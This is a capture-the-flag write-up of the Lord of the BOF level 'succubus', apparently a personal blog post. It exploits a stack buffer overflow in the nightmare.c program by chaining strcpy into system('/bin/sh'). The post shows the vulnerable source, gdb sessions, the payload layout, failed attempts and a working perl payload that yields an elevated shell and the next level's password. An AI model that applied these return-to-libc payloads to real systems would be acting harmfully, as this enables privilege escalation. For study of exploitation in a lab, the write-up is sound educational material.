
LOB Level 18 (succubus)

plummmm 2021. 4. 12. 19:15

Let's open the nightmare.c source code.

 

/*
        The Lord of the BOF : The Fellowship of the BOF
        - nightmare
        - PLT
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dumpcode.h>

main(int argc, char *argv[])
{
        char buffer[40];
        char *addr;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // check address
        addr = (char *)&strcpy;
        if(memcmp(argv[1]+44, &addr, 4) != 0){
                printf("You must fall in love with strcpy()\n");
                exit(0);
        }

        // overflow!
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // dangerous waterfall
        memset(buffer+40+8, 'A', 4);
}

 

Hmm.. looking at the "check address" part, it says the return address has to be the address of strcpy.

But what's the point of returning to strcpy.. on its own it's useless..

So what comes to mind is RTL chaining: doing RTL calls one after another.

Since strcpy has to appear once anyway, let's use RTL chaining to make one more call after it.

For that we first need to find a PPR gadget, since strcpy takes 2 arguments,

 

[succubus@localhost succubus]$ objdump -d nightmare |grep "pop" -A3 |grep "ret" -B3
 80486b0:       5b                      pop    %ebx
 80486b1:       5e                      pop    %esi
 80486b2:       c9                      leave
 80486b3:       c3                      ret

 

 

I looked for a ppr gadget, but there isn't one in the binary.

If you insisted, you could go into the library, work out the offset, add the image base and use a ppr from there

(since LOB has no ASLR).

But I judged that this goes against what the challenge is asking for, so I thought about another approach.

Let's think about why they made strcpy's address go into the ret slot.

It's a function that copies strings.

So put the system function and its argument in the stack buffer, then copy them onto the ret slot; that should work.

The payload is

[&SYSTEM] ["A"4] ["/bin/sh"] [NOP32] [&STRCPY] [NOP4] [&dest4] [&src4]

 

[succubus@localhost succubus]$ gdb -q nightmara
(gdb) set disassembly-flavor intel
(gdb) b *main+3
Breakpoint 1 at 0x80486b7
(gdb) r
Starting program: /home/succubus/nightmara

Breakpoint 1, 0x80486b7 in main ()

(gdb) print system
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

 

Got the system address.

The "/bin/sh" address is reused from before: 0x400fbff9

I confirmed the strcpy address by adding a printf of addr to the code.

 

[succubus@localhost succubus]$ gdb -q nightmara
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x80486b4 <main>:       push   %ebp
0x80486b5 <main+1>:     mov    %ebp,%esp
0x80486b7 <main+3>:     sub    %esp,44
0x80486ba <main+6>:     cmp    DWORD PTR [%ebp+8],1
0x80486be <main+10>:    jg     0x80486d7 <main+35>
0x80486c0 <main+12>:    push   0x80487db
0x80486c5 <main+17>:    call   0x80483e0 <printf>
0x80486ca <main+22>:    add    %esp,4
0x80486cd <main+25>:    push   0
0x80486cf <main+27>:    call   0x80483f0 <exit>
0x80486d4 <main+32>:    add    %esp,4
0x80486d7 <main+35>:    mov    DWORD PTR [%ebp-44],0x8048410
0x80486de <main+42>:    push   4
0x80486e0 <main+44>:    lea    %eax,[%ebp-44]
0x80486e3 <main+47>:    push   %eax
0x80486e4 <main+48>:    mov    %eax,DWORD PTR [%ebp+12]
0x80486e7 <main+51>:    add    %eax,4
0x80486ea <main+54>:    mov    %edx,DWORD PTR [%eax]
0x80486ec <main+56>:    add    %edx,44
0x80486ef <main+59>:    push   %edx
0x80486f0 <main+60>:    call   0x80483c0 <memcmp>
0x80486f5 <main+65>:    add    %esp,12
0x80486f8 <main+68>:    mov    %eax,%eax
0x80486fa <main+70>:    test   %eax,%eax
0x80486fc <main+72>:    je     0x8048715 <main+97>
0x80486fe <main+74>:    push   0x8048800
0x8048703 <main+79>:    call   0x80483e0 <printf>
0x8048708 <main+84>:    add    %esp,4
0x804870b <main+87>:    push   0
0x804870d <main+89>:    call   0x80483f0 <exit>
0x8048712 <main+94>:    add    %esp,4
0x8048715 <main+97>:    mov    %eax,DWORD PTR [%ebp+12]
0x8048718 <main+100>:   add    %eax,4
0x804871b <main+103>:   mov    %edx,DWORD PTR [%eax]
0x804871d <main+105>:   push   %edx
0x804871e <main+106>:   lea    %eax,[%ebp-40]
0x8048721 <main+109>:   push   %eax
0x8048722 <main+110>:   call   0x8048410 <strcpy>
0x8048727 <main+115>:   add    %esp,8
0x804872a <main+118>:   lea    %eax,[%ebp-40]
0x804872d <main+121>:   push   %eax
0x804872e <main+122>:   push   0x8048825
0x8048733 <main+127>:   call   0x80483e0 <printf>
0x8048738 <main+132>:   add    %esp,8
0x804873b <main+135>:   push   4
0x804873d <main+137>:   push   65
0x804873f <main+139>:   lea    %eax,[%ebp-40]
0x8048742 <main+142>:   lea    %edx,[%eax+48]
0x8048745 <main+145>:   push   %edx
0x8048746 <main+146>:   call   0x8048400 <memset>
0x804874b <main+151>:   add    %esp,12
0x804874e <main+154>:   leave
0x804874f <main+155>:   ret
End of assembler dump.

(gdb) b *strcpy
Breakpoint 4 at 0x8048410
(gdb) b *main+154
Breakpoint 5 at 0x804874e
(gdb) r `perl -e 'print "A"x44, "\x10\x84\x04\x08"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/succubus/nightmara `perl -e 'print "A"x44, "\x10\x84\x04\x08"'`
Breakpoint 4 at 0x400767b0: file ../sysdeps/generic/strcpy.c, line 30.

Breakpoint 4, strcpy (dest=0x2 <Address 0x2 out of bounds>, src=0xbffffb24 "\034????)
    at ../sysdeps/generic/strcpy.c:30
30      ../sysdeps/generic/strcpy.c: No such file or directory.
(gdb) c
Continuing.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA?

Breakpoint 5, 0x804874e in main ()
(gdb) x/50x $esp
0xbffffaac:     0x08048410      0x41414141      0x41414141      0x41414141
0xbffffabc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffacc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffadc:     0x08048410      0x41414141      0xbffffb24      0xbffffb30
0xbffffaec:     0x40013868      0x00000002      0x08048420      0x00000000
0xbffffafc:     0x08048441      0x080486b4      0x00000002      0xbffffb24
0xbffffb0c:     0x08048350      0x0804877c      0x4000ae60      0xbffffb1c
0xbffffb1c:     0x40013e90      0x00000002      0xbffffc1c      0xbffffc35
0xbffffb2c:     0x00000000      0xbffffc66      0xbffffc88      0xbffffc92
0xbffffb3c:     0xbffffca0      0xbffffcbf      0xbffffcd0      0xbffffce8
0xbffffb4c:     0xbffffd06      0xbffffd25      0xbffffd30      0xbffffd3e
0xbffffb5c:     0xbffffd82      0xbffffd96      0xbffffdab      0xbffffdbb
0xbffffb6c:     0xbffffdc9      0xbffffde9

The stack start address is 0xbffffab0,

so let's go with 0xbffffadc as the ret address.
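As an added example (not part of the original write-up), a small Python helper that parses the `x/50x $esp` dump above and locates where the strcpy address 0x08048410 landed relative to the buffer start, which is how the 44-byte distance to the ret slot checked by memcmp(argv[1]+44, ...) is confirmed. The sample rows are re-typed from the session above as constructed input.

```python
import re

# Constructed sample: the first four rows of the `x/50x $esp` dump from the
# gdb session above, re-typed here so the helper runs offline.
GDB_DUMP = """\
0xbffffaac:     0x08048410      0x41414141      0x41414141      0x41414141
0xbffffabc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffacc:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffffadc:     0x08048410      0x41414141      0xbffffb24      0xbffffb30
"""

# One dump row: "<address>:" followed by one or more 8-hex-digit dwords.
ROW_RE = re.compile(r"^\s*(0x[0-9a-f]+):\s+((?:0x[0-9a-f]{8}\s*)+)$", re.I)


def parse_gdb_dump(text):
    """Turn `x/Nx` output into {address: dword}; each column is 4 bytes."""
    words = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if not m:
            continue  # skip the (gdb) prompt and any non-row lines
        base = int(m.group(1), 16)
        for i, tok in enumerate(m.group(2).split()):
            words[base + 4 * i] = int(tok, 16)
    return words


def find_dword(words, value):
    """All addresses holding `value`, lowest first."""
    return sorted(a for a, v in words.items() if v == value)


def offset_to(words, start, value):
    """Distance in bytes from `start` to the first occurrence of `value`
    at or after it, or None if the value never appears there."""
    hits = [a for a in find_dword(words, value) if a >= start]
    return hits[0] - start if hits else None


if __name__ == "__main__":
    w = parse_gdb_dump(GDB_DUMP)
    # 0x08048410 appears twice: the leftover at esp and the ret slot.
    print([hex(a) for a in find_dword(w, 0x08048410)])
    # Buffer starts at 0xbffffab0; the ret slot is 44 bytes past it.
    print(offset_to(w, 0xbffffab0, 0x08048410))
```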

 

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault
[succubus@localhost succubus]$ ./nightmara `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault (core dumped)
[succubus@localhost succubus]$ gdb -q nightmara core
Core was generated by `./nightmara ?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱 猩???.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x41414141 in ?? ()
(gdb) x/40x $esp-52
0xbffffab0:     0x40058ae0      0x41414141      0x400fbff9      0x90909090
0xbffffac0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffad0:     0x90909090      0x90909090      0x4000ae60      0x90909090
0xbffffae0:     0x41414141      0xbffffb24      0xbffffb34      0x40013868
0xbffffaf0:     0x00000003      0x08048420      0x00000000      0x08048441
0xbffffb00:     0x080486b4      0x00000003      0xbffffb24      0x08048350
0xbffffb10:     0x0804877c      0x4000ae60      0xbffffb1c      0x40013e90
0xbffffb20:     0x00000003      0xbffffc65      0xbffffc78      0xbffffc90
0xbffffb30:     0xbffffcaf      0xbffffcd1      0xbffffcdf      0xbffffea2
0xbffffb40:     0xbffffec1      0xbffffedf      0xbffffef4      0xbfffff14
(gdb) x/x  0x4000ae60
0x4000ae60 <_dl_fini>:  0x83e58955
(gdb) x/s 0x4000ae60
0x4000ae60 <_dl_fini>:   "U\211?203?004WVS?
(gdb) quit
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xd0\xfa\xff\xbf","\xa0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xf0\xfa\xff\xbf","\xc0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault
[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","\xA"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱?
Segmentation fault

 

I had the addresses right, but I kept getting a segmentation fault because I had written "\xA"x4 instead of "A"x4.. (how dumb..)

 

[succubus@localhost succubus]$ ./nightmare `perl -e 'print "\xe0\x8a\x05\x40","A"x4,"\xf9\xbf\x0f\x40","\x90"x32,"\x10\x84\x04\x08","A"x4,"\xe0\xfa\xff\xbf","\xb0\xfa\xff\xbf"'`
?@AAAA廈@릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱릱AAAA猩???
bash$ id
uid=517(succubus) gid=517(succubus) euid=518(nightmare) egid=518(nightmare) groups=517(succubus)
bash$ my-pass
euid = 518
beg for me
bash$
